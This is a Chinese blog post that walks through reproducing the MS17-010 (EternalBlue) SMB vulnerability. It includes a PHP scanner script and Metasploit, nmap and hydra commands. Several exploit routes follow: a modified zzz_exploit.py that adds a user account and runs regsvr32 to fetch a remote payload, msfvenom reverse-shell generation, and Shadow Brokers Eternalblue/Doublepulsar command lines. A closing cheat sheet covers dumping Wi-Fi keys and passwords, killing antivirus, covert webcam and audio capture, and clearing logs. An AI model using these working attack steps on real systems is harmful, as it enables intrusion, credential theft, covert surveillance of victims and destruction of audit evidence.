Nas_ms17_010

凡是不能把我毁灭的,都将使我更强

0x00 缘来

时隔半年,清水煮青蛙,再次复现下 ms17010…

0x02 扫描探测


1.php脚本

From:冰封 用法: http://127.0.0.1/ms17-010.php?host=10.211.55.10

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
<?php
//根据巡风python代码翻译成PHP代码
//2017.08.03 by ice && By T00ls.Net;
//https://github.com/ysrc/xunfeng/blob/master/vulscan/vuldb/MS17_010.py
@error_reporting(7);
if(@$_GET['host']){
$host=trim($_GET['host']);
if(ms17010($host,445)){
echo '<span style="color:#F00">[+] Vulnerability!</span>';
}else{
echo '<span style="color:#000">[-] No Vulnerability!</span>';
}
echo '
[+] OS: <span style="color:#666">'.smbos($host,445)."</span>
";
}
function ms17010($host,$port){
$tcp='tcp://'.$host.':'.$port;
$sock=stream_socket_client($tcp,$errno, $errstr, 3,STREAM_CLIENT_CONNECT);
if ($sock){
$data1=pack('H*','00000054ff534d42720000000018012800000000000000000000000000002f4b0000c55e003100024c414e4d414e312e3000024c4d312e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200');
fwrite($sock,$data1);
fread($sock, 1024);
$data2=pack('H*','00000063ff534d42730000000018012000000000000000000000000000002f4b0000c55e0dff000000dfff02000100000000000000000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000');
fwrite($sock,$data2);
$data2_data=fread($sock, 1024);
$user_id=substr(bin2hex($data2_data),64,4);
$data3=pack('H*','000000'.dechex(58+strlen($host)).'ff534d42750000000018012000000000000000000000000000002f4b'.$user_id.'c55e04ff000000000001001a00005c5c'.bin2hex($host).'5c49504324003f3f3f3f3f00');
fwrite($sock,$data3);
$data3_data=fread($sock, 1024);
$allid=substr(bin2hex($data3_data),28*2,16);
$data4=pack('H*','0000004aff534d422500000000180128000000000000000000000000'.$allid.'1000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00');
fwrite($sock,$data4);
$data4_data=fread($sock, 1024);
if(substr(bin2hex($data4_data),18,8) == '050200c0'){
return true;
}else{
return false;
}
}
}
function smbos($host,$port){
$tcp='tcp://'.$host.':'.$port;
$sock=stream_socket_client($tcp,$errno, $errstr, 3,STREAM_CLIENT_CONNECT);
if ($sock){
$payload1=pack('H*','00000085ff534d4272000000001853c80000000000000000000000000000fffe00000000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200');
$payload2=pack('H*','0000010aff534d4273000000001807c80000000000000000000000000000fffe000040000cff000a01044132000000000000004a0000000000d40000a0cf00604806062b0601050502a03e303ca00e300c060a2b06010401823702020aa22a04284e544c4d5353500001000000078208a2000000000000000000000000000000000502ce0e0000000f00570069006e0064006f0077007300200053006500720076006500720020003200300030003300200033003700390030002000530065007200760069006300650020005000610063006b002000320000000000570069006e0064006f0077007300200053006500720076006500720020003200300030003300200035002e00320000000000');
fwrite($sock,$payload1);
$out1=fread($sock, 1024);
fwrite($sock,$payload2);
$out2=fread($sock, 1024);
$blob_len_arr=unpack('s',substr($out2,36+7,2));
$osarr=explode(chr(0),iconv('UTF-16LE','UTF-8',substr($out2,36+11+$blob_len_arr[1])));
return $osarr[0].'|'.$osarr[1];
}
}
?>


2.批量扫描脚本

https://github.com/claudioviviani/ms17-010-m4ss-sc4nn3r

1
2
3
4
5
[+] Usage: ms17-010-m4ss-sc4nn3r.py ip or ip/CIDR or ip/subnet
Example: ms17-010-m4ss-sc4nn3r.py 192.168.0.1
ms17-010-m4ss-sc4nn3r.py 192.168.0.0/24
ms17-010-m4ss-sc4nn3r.py 192.168.0.0/255.255.255.0x00


3.smb_ms17_010

Metasploit扫描MS17-010的方案完全同Nmap,但Session Setup AndX Request中的Max Buffer用0xffdf。看上去只有Nessus动用了Unicode。
该洞不只是445可用,139同样可用。利用139攻击时,只需要多发1至2个报文,视目标系统而定。在管理性扫描中,务必同时检查两个端口。
探测MS17-010可以先通过smb模块扫描出开放了445端口的主机,然后再使用MS17-010模块进行漏洞探测
扫描完成后,扫描的信息会自动存入数据库,可通过hosts命令查看

1
2
3
4
5
6
7
8
9
use auxiliary/scanner/smb/smb_version
set rhosts x.x.x.0/24
set threads 16
run
use auxiliary/scanner/smb/smb_ms17_010
show options
set threads 16
services -r tcp -p 445 -R
run


或者也可以这样

1
2
3
4
5
6
use auxiliary/scanner/smb/smb_ms17_010
set ShowProgress false
set ConnectTimeout 5
set THREADS 16
set RHOSTS x.x.x.x
run

smb_ms17_010.rb缺省只扫445/TCP。如果想扫139/TCP,必须:

set SMBDirect false
set RPORT 139
或者

unset SMBDirect
set RPORT 139


4.MS17-010-Nessus.exe

下面这个同时支持139/TCP的单扫工具不是广告,只是和运维人员结个善缘:

《采用Nessus扫描方案的Windows版MS17-010单扫工具》
http://scz.617.cn/windows/MS17-010-Nessus.exe
http://scz.617.cn/windows/201706221521.txt

万一有运行时库方面的问题,自行解决吧。除了下面演示的命令行参数,其他五花八
门的命令行参数无需关心,那是历史遗迹。

指定IP范围:

$ MS17-010-Nessus.exe -q -m -b 192.168.0.1 -e 192.168.255.254 -o scan.out

指定目标主机列表(每行一个目标):

$ MS17-010-Nessus.exe -q -m -l hostlist -o scan.out

该漏洞可以通过139/TCP利用,不限于445/TCP:

$ MS17-010-Nessus.exe -q -m -b 192.168.0.1 -e 192.168.255.254 -o scan.out -p 139
$ MS17-010-Nessus.exe -q -m -l hostlist -o scan.out -p 139

如果不指定-o scan.out,向stdout输出

-q 只显示vulnerable主机,否则将显示safe、unknown等其他主机

-m 实时显示当前扫描目标,可以不指定

scan.out的输出形如:

1
2
3
4
5
6
xx.xx.xxx.xx safe [Unix|Samba 3.6.25|WORKGROUP][@WORKGROUP]
xx.xx.x.xx vulnerable [Windows 7 Ultimate 7600|Windows 7 Ultimate 6.1|WORKGROUP][APPLE-PC@WORKGROUP]
xxx.xxx.xx.xxx vulnerable [Windows 7 Ultimate 7601 Service Pack 1|Windows 7 Ultimate 6.1|WORKGROUP][USER-20160307TC@WORKGROUP]
xxx.xxx.xx.xxx vulnerable [Windows 10 Pro 10240|Windows 10 Pro 6.3|WORKGROUP][DESKTOP-7DGEL49@WORKGROUP]
xxx.xxx.xx.xxx vulnerable [Windows Server 2008 R2 Enterprise 7601 Service Pack 1|Windows Server 2008 R2 Enterprise 6.1|WORKGROUP][WIN-UV3JAC9UP5A@WORKGROUP]
xx.xx.x.xxx 0xFFFF0002 [OS 1.00|SMB 1.0|WORKGROUP][@]


5.Nmap

不多说
nmap --script smb-vuln-ms17-010 -p445 targetip


0x03 漏洞利用

一. worawit/MS17-010

https://github.com/worawit/MS17-010
这个脚本其实在nas放出一个月就公开再Exploit-db了,很多人估计都不知道..
那么,查看zzz_exploit.py脚本会看到 from mysmb import MYSMB 之前有人使用python钓鱼:mysmb,其实真正安装了这个模块的人其实这个脚本反倒会利用失败.并且把信息发送给钓鱼者.

回到正题.

依赖项

1.pipe

经常执行脚本会发现报错.如下所示

1
2
3
4
$ python zzz_exploit.py 10.10.10.19 system
Target OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1
Not found accessible named pipe
Done

你可能需要的pipe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
netlogon
lsarpc
samr
browser
atsvc
DAV RPC SERVICE
epmapper
eventlog
InitShutdown
keysvc
lsass
LSM_API_service
ntsvcs
plugplay
protected_storage
router
SapiServerPipeS-1-5-5-0-70123
scerpc
srvsvc
tapsrv
trkwks
W32TIME_ALT
wkssvc
PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
db2remotecmd
```netlogon
lsarpc
samr
browser
atsvc
DAV RPC SERVICE
epmapper
eventlog
InitShutdown
keysvc
lsass
LSM_API_service
ntsvcs
plugplay
protected_storage
router
SapiServerPipeS-1-5-5-0-70123
scerpc
srvsvc
tapsrv
trkwks
W32TIME_ALT
wkssvc
PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
db2remotecmd

那么直接通过 python zzz_exploit.py <ip> [pipe_name] 即可
当然有些时候没有设置username和password,并且共享中启动了密码访问..也会导致这个问题

或者可以通过
auxiliary/scanner/smb/pipe_auditor 模块找寻你需要的pipe

1
2
3
4
use auxiliary/scanner/smb/pipe_auditor
set rhosts 10.10.10.19
set threads 20
exploit


2.username and password

USERNAME = ''
PASSWORD = ''
只需要更改系统中存在的共享smb账户,无论权限多低

那么我们怎么找到对应的账户呢,使用如下两种,当然使用自己写python脚本更佳啊

1
2
3
4
5
6
msfconsole
use auxiliary/scanner/smb/smb_login
set rhosts 10.10.10.0-255
set USER_FILE user.txt
set PSSS_FILE pass.txt
exploit

hydra -L user.txt -P pass.txt -t 20 10.10.10.10 smb

注意: 此脚本最关键地方

1
2
3
4
5
6
7
8
print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
fid2 = smbConn.createFile(tid2, '/pwned.txt')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)
# smb_send_file(smbConn, sys.argv[0], 'C', '/exp.txt')
service_exec(conn, r'cmd /c net user test test /add')

如果测试成功,会发现c盘新建了一个pwned.txt文件,同时会执行命令net user test test /add

如果觉得繁琐,可以用powershell/regsvr32等等执行脚本内容

1
2
3
4
5
6
7
use exploit/multi/script/web_delivery
set target 3
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.19
exploit
regsvr32 /s /n /u /i:http://192.168.2.164:8080/5Msr8HdNh.sct scrobj.dll

在python代码更改成如下即可

service_exec(conn, r'cmd /c regsvr32 /s /n /u /i:http://192.168.2.164:8080/5Msr8HdNh.sct scrobj.dll')


二.Eternalblue-Doublepulsar-Metasploit

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/

修改eternalblue_doublepulsar.rb中成自己的目录,修改完成后,我们将rb文件放到metasploit的目录exploit/windows/smb/

1
2
3
4
5
6
7
register_options([
OptEnum.new('TARGETARCHITECTURE', [true,'Target Architecture','x86',['x86','x64']]),
OptString.new('ETERNALBLUEPATH',[true,'Path directory of Eternalblue','/root/Eternalblue-Doublepulsar-Metasploit/deps/']),
OptString.new('DOUBLEPULSARPATH',[true,'Path directory of Doublepulsar','/root/Eternalblue-Doublepulsar-Metasploit/deps/']),
OptString.new('WINEPATH',[true,'WINE drive_c path','/root/.wine/drive_c/']),
OptString.new('PROCESSINJECT',[true,'Name of process to inject into (Change to lsass.exe for x64)','wlms.exe'])
], self.class)

启动msf后使用reload_all命令重新加载模块

1
2
3
4
5
6
7
8
9
10
msfvemon -p windows/meterpreter/reverse_tcp lhost=192.168.12.110 lport=4444 -f dll -o /root/.wine/drive_c/eternal11.dll
msfconsole
reload_all
search eternalblue_doublepulsar.rb
use exploit/windows/smb/eternalblue_doublepulsar
set RHOST 192.168.56.101
set Payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
exploit

三.python3之ms17-010.py

下载地址:http://blackwolfsec.cc/static/code/ms17-010.py
From: blackwolf

文件内容必须为shellcode格式(dll会蓝屏),shellcode生成方式

1
2
1.nc reverse shellcode: "msfvenom -p windows/x64/shell_reverse_tcp LHOST=x.x.x.x LPORT=xxx -f raw > shellcode"
2.meterpreter reverse shellcode: "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -f raw > shellcode"

使用方法:
python3 ms17-010.py –host x.x.x.x –file ./shellcode
参考链接:
https://www.exploit-db.com/exploits/41987/
https://github.com/RiskSense-Ops/MS17-010/tree/master/exploits/eternalblue


四.ms17010命令行版本

https://github.com/misterch0c/shadowbroker

准备工作:

把 windows/lib/x86-windows 路径下所有的dll拷贝到 windows/specials/ 和 windows/payloads/这两个目录下
把 windows/specials/ 下的 Eternalblue-2.2.0.0.xml 改名为 Eternalblue-2.2.0.xml
把 windows/payloads/ 下的 Doublepulsar-1.3.1.0.xml 改名为 Doublepulsar-1.3.1.xml

1
2
3
4
5
6
7
8
9
开启监听并生成shell_dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.14.129 LPORT=4455 -f dll > /root/Desktop/test_64.dll
msfconsole -q -X "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.14.129; set lport 4455; run;"
扫描探测
F:\shadowbroker\windows\specials\Eternalblue-2.2.0.exe --TargetIp 192.168.14.132 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E:\\Users\\Test\\Desktop\\445.txt
执行攻击
F:\shadowbroker\windows\payloads\Doublepulsar-1.3.1.exe --OutConfig E:\\Users\\Test\\Desktop\\446.txt --TargetIp 192.168.14.132 --TargetPort 445 --DllPayload F:\\eeeter\\windows\\payloads\\test_64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll

五.ms17_010_eternalblue

至于防火墙可以通过https和dns的payload走就行了

1
2
3
4
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/meterpreter/bind_tcp
set rhost x.x.x.x
exploit

六.ms17_010_psexec

全版本通杀,至于为什么.因为有依赖条件.必须是禁止密码保护共享的

1
2
3
4
exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set rhost x.x.x.x
exploit

1
2
3
4
5
6
7
8
9
10
11
12
好久没玩都快忘光了,一些命令再记下...
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear //无线密码
load mimikatz && wdigest //抓取明文密码
bgrun killav //杀掉杀毒软件
webcam_list //查看有没有摄像头
bgrun webcam //启动摄像头
webcam_snap -i 1 -v false //启动摄像头拍摄一张照片但不打开闪光灯
bgrun sound_recorder //启动声音录制
bgrun hashdump //获取哈希值
bgrun vnc //启动vnc连接
screenshot //对目标系统桌面进行截屏
clearev //清除日志

本文为原创,转载请遵守本站的版本

更新于: 2018年10月26日 01:10